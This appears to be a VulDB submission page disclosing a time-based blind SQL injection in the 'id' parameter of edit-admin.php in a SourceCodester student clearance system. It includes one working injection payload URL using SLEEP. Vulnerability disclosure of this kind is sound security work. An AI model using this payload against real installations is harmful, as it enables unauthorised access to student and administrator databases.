Submit #49888: Web-Based Student Clearance System is vulnerable to a SQL Injection(edit-admin.php)info

TitleWeb-Based Student Clearance System is vulnerable to a SQL Injection(edit-admin.php)
DescriptionWeb-Based Student Clearance System is vulnerable to a SQL Injection(edit-admin.php) url:/Admin/edit-admin.php URI parameter 'id' is vulnerable Line 32 of edit-admin.php invokes a SQL query built with input that comes from an untrusted source. This call could allow an attacker to modify the statement's meaning or to execute arbitrary SQL commands. payload: Parameter: #1* (URI) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: http://127.0.0.1:80/student_clearance_system_Aurthur_Javis/admin/edit-admin.php?id=5' AND (SELECT 2846 FROM (SELECT(SLEEP(5)))sOPo) AND 'uvpP'='uvpP Download Code: https://www.sourcecodester.com/php/15627/web-based-student-clearance-system.html
Source⚠️ https://blog.csdn.net/qq_41988749/article/details/127552717?spm=1001.2014.3001.5502
User
 jinyadong (UID 34634)
Submission10/27/2022 09:17 (3 years ago)
Moderation10/28/2022 07:32 (22 hours later)
StatusAccepted
VulDB entry212415 [SourceCodester Web-Based Student Clearance System Admin/edit-admin.php ID sql injection]
Points20

PreviousOverviewNext

Might our Artificial Intelligence support you?

Check our Alexa App!